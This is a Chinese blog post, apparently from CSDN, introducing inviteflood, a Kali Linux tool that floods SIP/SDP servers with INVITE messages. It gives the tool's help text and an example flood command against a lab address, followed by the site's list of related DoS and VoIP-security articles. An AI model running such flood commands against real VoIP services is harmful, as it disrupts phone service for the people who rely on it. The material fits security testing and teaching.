inviteflood -SIP/SDP 泛洪攻击

最新推荐文章于 2023-10-04 20:09:45 发布
最新推荐文章于 2023-10-04 20:09:45 发布
阅读量6.4k 收藏 5
点赞数 1
分类专栏: 应用安全 文章标签: 网络 安全 flood 泛洪 voip
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29277155/article/details/51704558
版权

0x00前言

会话发起协议(Session Initiation Protocol,缩写SIP)
会话描述协议(Session Description Protocol或简写SDP)描述的是流媒体的初始化参数。
SIP与H.323一样,是用于VoIP最主要的信令协议之一。SIP最初由IETF标准化和管理,而H.323VoIP协议则从传统上与ITU有着更多的联系。
SIP的设计目标之一是提供类似公用交换电话网(PSTN)中呼叫处理功能的扩展集。在这个扩展集中,实现类似日常电话的操作:拨号,振铃,回铃音或者忙音,只是实现方式和术语有所不同。
SIP也实现了许多七号信令系统(SS7)中更高级的呼叫处理功能,尽管这两个协议相差很远。SS7是一个高度集中处理的协议,其特点表现为高复杂度的中心网络结构和无智能的哑终端(传统的电话机)。SIP则是一个点对点协议,所以它只需要一个相对简单的(因此也高度可扩展的)核心网络,而将处理工作下放给连接在网络边缘的智能端点(装有硬件或软件的终端设备)。SIP的许多功能在端点中实现,这与传统的SS7将其在网络核心设备实现的作法大异其趣。
SIP同HTTP相似并采用了后者的一些设计原则:SIP报文是人类可读的,并且也是采取请求-应答的流程。SIP借用了许多HTTP状态码,如常见的'404 not found'。
SDP用于和RTSP以及SIP协同工作,也可被单独用来描述多播会话。

0x01 简介

  通过TCP/UDP进行泛洪攻击的SIP/SDP会话,该工具可以在本i机产生大量的流量,因为需要在本地读取数据进行对外发送。所以在流量监控时可能会产生40M/s的速度。

使用帮助

root@kali:~# inviteflood -h
inviteflood - Version 2.0
              June 09, 2006
 Usage:
 Mandatory -
    interface (e.g. eth0)
    target user (e.g. "" or john.doe or 5000 or "1+210-555-1212")
    target domain (e.g. enterprise.com or an IPv4 address)
    IPv4 addr of flood target (ddd.ddd.ddd.ddd)
    flood stage (i.e. number of packets)
 Optional -
    -a flood tool "From:" alias (e.g. jane.doe)
    -i IPv4 source IP address [default is IP address of interface]
    -S srcPort  (0 - 65535) [default is well-known discard port 9]
    -D destPort (0 - 65535) [default is well-known SIP port 5060]
    -l lineString line used by SNOM [default is blank]
    -s sleep time btwn INVITE msgs (usec)
    -h help - print this usage
    -v verbose output mode

0x02 使用示例

使用接口eth0 并且提供5000用户,使用100个包向目标域名(example.local) 和泛洪主机(192.168.1.5) 进行泛洪攻击。
root@kali:~# inviteflood eth0 5000 example.local 192.168.1.5 100
inviteflood - Version 2.0
              June 09, 2006

source IPv4 addr:port   = 192.168.1.202:9
dest   IPv4 addr:port   = 192.168.1.5:5060
targeted UA             = 5000@192.168.1.1

Flooding destination with 100 packets
sent: 100


欢迎大家分享更好的思路,热切期待^^_^^ !!!

qq_29277155
关注
专栏目录
Kali Linux- 社会工程及压力工具教程
简介
02-04 2077
这期比较短,但是包含了社工和DDOS工具下期讲解嗅探和欺骗和密码破解工具我发现没人发kaliLinux工具教程虽然有,但也是零零散散的,所以我出了这期Linux工具教程,但我感觉还是不详细。
inviteflood 洪泛滥工具
weixin_30326741的博客
04-30 366
  inviteflood是一种通过UDP/IP执行SIP/SDP INVITE消息泛洪的工具,描述可以参考:inviteflood Package Description   使用inviteflood工具,可以轻易对提供SIP服务进行攻击。 # inviteflood eth0 6666660000042 172.16.176.120 172.16.176.120 100000 ...
SIP协议固有的安全漏洞
-第二月-的专栏
12-05 3289
  同许多互联网协议一样,SIP(会话起始协议)协议是根据简化的思路,而不是根据安全的思路设计的。虽然H.323协议的创建是为了满足更广泛的目标,但是,安全问题也影响到了这个协议。这个协议本身就存在一些安全漏洞,把这个标准转化为产品的开发人员也为这个协议增加了一些安全漏洞。下面就是一些例子:  纯文本SIP信息是微不足道的,不值得修改或者插入,特别是在宽带网媒介上。虽然SIP没有加密,但是,可
泛洪攻击Flood Attack)
最新发布
探测???
10-04 2380
执行网络攻击,包括 Ping 泛洪攻击,在绝大多数国家/地区都是非法的,它违反了计算机犯罪法律和条例。执行或尝试执行这样的攻击通常会导致法律后果,包括罚款和监禁。因此,这些信息仅供理论学习和了解,绝不应用于非法活动。“泛洪攻击”(Flood Attack)是一种常见的网络攻击类型,其基本思路是通过极大量的网络请求来消耗目标系统的资源,从而使目标系统过载、响应缓慢或者完全无响应。这种攻击通常用来实现 DoS(拒绝服务)或 DDoS(分布式拒绝服务)攻击
猿创征文|HCIE-Security Day50:网络攻击介绍
小梁的博客
09-03 1035
针对计算机信息系统、基础设施、计算机网络或个人计算机设备等的任何类型的进攻动作。
KALI应用篇(一)压力测试
qq_40424448的博客
04-01 7046
方法论 在简单了解了Linux的发展史并掌握了Linux的系统&操作逻辑后,KALI手册的第一课,就是如何进行有效的压力测试。在七层模型(OSI)中,压力测试通常会测试传输层和网络层,以保证系统的三要素(机密性、完整性、可用性)。 压力测试有着不同的测试原理,同时也有着不同的方法和工具。总的来说,大概可以分成三种,即1、LOT(专用设备、物联网设备)压力测试 2、基于IP传输协议的WAN压力测试 3、基于SIP\TCP\的互联网压力测试 在我阅读KALI手册时,我发现一个很重要的问题:作者
java sip 携带sdp_完整SIP/SDP媒体协商概论-SDP协商模式详解
weixin_32589453的博客
03-04 634
当我们讨论SIP或者SDP的一些技术话题时,SDP的协商是一个绕不过的话题。具体的协商机制涉及了多个方面的内容。在我们的讨论中,笔者将会针对两个比较重要的话题进行讨论,一个是SDP offer/answer 模式,另外一个是在NAT场景中的SDP offer/answer交互模式拓展ICE。在本章节中,我们将首先讨论SDP offer/answer交互模式,具体内容包括:offer/answer的...
一个简单的JAVA-JAIN-SIP客户端,可以连接SIP服务端发起呼叫
03-02
11. **SDP (Session Description Protocol)**: SDP是伴随SIP请求发送的,描述了呼叫的媒体类型、编码、带宽等信息。 12. **Dialog**: 一次呼叫建立后,SIP会话中的交互由一系列与特定对话相关的请求和响应组成。 ...
java sip 携带sdp_SIP中的SDP offer/answer交换初探
weixin_39726408的博客
03-04 776
1、早期媒体无论是在PSTN还是在VoIP网络中,一个呼叫的最终目的让两个用户进行交谈(conversation)。这里我们将由用户之间的交谈所产生的媒体称为常规媒体(“regular media”)。早期媒体(“early media”)是与常规媒体相比而言的。通常,主叫用户发起呼叫后用户交谈并不会立即开始(甚至可能最终没有开始),等待时间一般是几秒到几十秒,这完全取决于被叫用户的何时应答。在被...
Sofia-SIP辅助文档二二 - Sofia SIP用户代理库 - "sdp" - SDP模块
Neohan的专栏
06-25 1058
http://sofia-sip.sourceforge.net/refdocs/sdp/index.html,翻译自官网的这张网页。 Module Meta Information The sdp module provides a simple "C" parser interface for SDP [RFC 2327], Session Description
IP:ip分片(fragment), SIP/SDP 总结
mzhan017的博客
06-03 528
UDP报文大小 57089 + checksum 约57K,没有超过UDP 标准的64K; MTU 大小 1488, 去掉 IPv6的头 40; 可装载的数据大小:1488-40=1448; 分片数 57097/1448 =39.4 ~=40 需要40个IP 分片 问题 如果对方处理不了这种巨多分片的报文,也无可厚非。UDP包太大了 例图 ............
华为防火墙笔记-网络攻击的原理和防范
weixin_46622350的博客
12-04 1万+
文章整理自《华为防火墙技术漫谈》 DoS攻击简介 Dos是Denial of Service的简称,即拒绝服务。造成Dos的攻击行为被称为Dos攻击,其目的是使计算机或网络无法正常提供服务。 我们打一个形象的比喻:街边有一个小餐馆为大家提供餐饮服务,但是这条街上有一群地痞总是对餐馆搞破坏,如霸占着餐桌不让其他客人吃饭也不结账,或者堵住餐馆的大门不让客人进门,甚至骚扰餐馆的服务员或者厨师不让他们正常干活,这样餐馆就没有办法正常营业了,这就是“拒绝服务”。 单包攻击及防御 ...
FreeSwitch防止sip攻击盗打的设置
shanghaimoon的专栏
03-22 2145
FreeSwtich作为一款开源的软交换控制系统,由于其出色的性能和稳定性,已经在全世界范围内得到了广泛的应用,包括一些大型的公司也都在使用。当FreeSwitch一旦部署在公有云上,有经验的使用者很快都会发现,有大量的非正常呼叫请求消息会对系统进行攻击,这有可能会造成系统被盗打线路的风险。其中几乎全部的攻击均来自于国外,本篇文章从系统防火墙的角度来配置如果防范来自国外的SIP攻击,文章的系统环境为Centos7,防火墙使用自带的firewalld。 第一步,我们配置一个名字...
常见Dos攻击原理及防护(死亡之Ping、Smurf、Teardown、LandAttack、SYN Flood
u013485792的专栏
08-02 2万+
DoS是Denial of Service的简称,即拒绝服务,造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务。最常见的DoS攻击有计算机网络带宽攻击和连通性攻击。     DoS攻击是指故意的攻击网络协议实现的缺陷或直接通过野蛮手段残忍地耗尽被攻击对象的资源,目的是让目标计算机或网络无法提供正常的服务或资源访问,使目标系统服务系统停止响应甚至崩溃,而在此攻击中并不
sip服务器被攻击不烦恼
dixiaoxia的博客
03-22 516
sip攻击,扫描,防火墙
扯谈网络编程之Tcp SYN flood洪水攻击
横云断岭的专栏
05-12 2万+
  update 2017-5-11: syncookies 会点用 tcp_options 字段空间,会强制关闭 tcp 高级流控技术而退化成原始 tcp 模式。此模式会导致 封包 丢失时 对端 要等待 MSL 时间来发现丢包事件并重试,以及关闭连接时 TIME_WAIT 状态保持 2MSL 时间。   简介 TCP协议要经过三次握手才能建立连接: (from wiki) 于是出...
两万字带你认识黑客在kali中使用的工具
热门推荐
qinshuoyang1的博客
09-11 2万+
Kali系统预装了大量的安全工具,可以说是一个安全工具的数据库。在kali2018.2系统中就有600多个工具,工具如此之多,掌握所有的工具是不现实的,只有需要用的时候再去学习工具的使用即可。但是了解这些工具的用途,掌握一些常用的安全工具是必要的,本篇文章主要对一些常用的安全工具进行介绍,这里只需要简单地了解一下这些工具的用途和使用方法,在后边的文章中将会用到这些工具完成相应的实操,还会具体讲解这些工具的使用。
SYN泛洪攻击
云舒编程的博客
10-02 8052
转自《SYN洪泛攻击的原理、预防和排除》 SYN泛洪攻击概述SYN泛洪攻击利用TCP三次握手协议的缺陷,向目标主机发送大量的伪造源地址的SYN连接请求,使得被攻击方资源耗尽,从而不能够为正常用户提供服务。SYN泛洪攻击原理在TCP协议中被称为三次握手(Three-way Handshake)的连接过程中,如果一个用户向服务器发送了SYN报文,服务器又发出 SYN+ACK 应答报文后未收到客户端的 A
Kali Linux 弱点分析工具全集
weixin_34004576的博客
12-12 396
继今年十月初,我完成了『Kali Linux 信息收集工具全集』视频课程之后。在过去两个月的时间里,我终于又完成了『Kali Linux Vulnerability Analysis』工具的全部视频课程。 『弱点分析』与『信息收集』类工具的定位非常不同,其中包含大量的模糊测试工具。正确使用这些工具,将有助于我们发现可能存在的零日漏洞。同时此类工具中还包含了大量VoIP相关的渗透测试工具,这可能是安...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值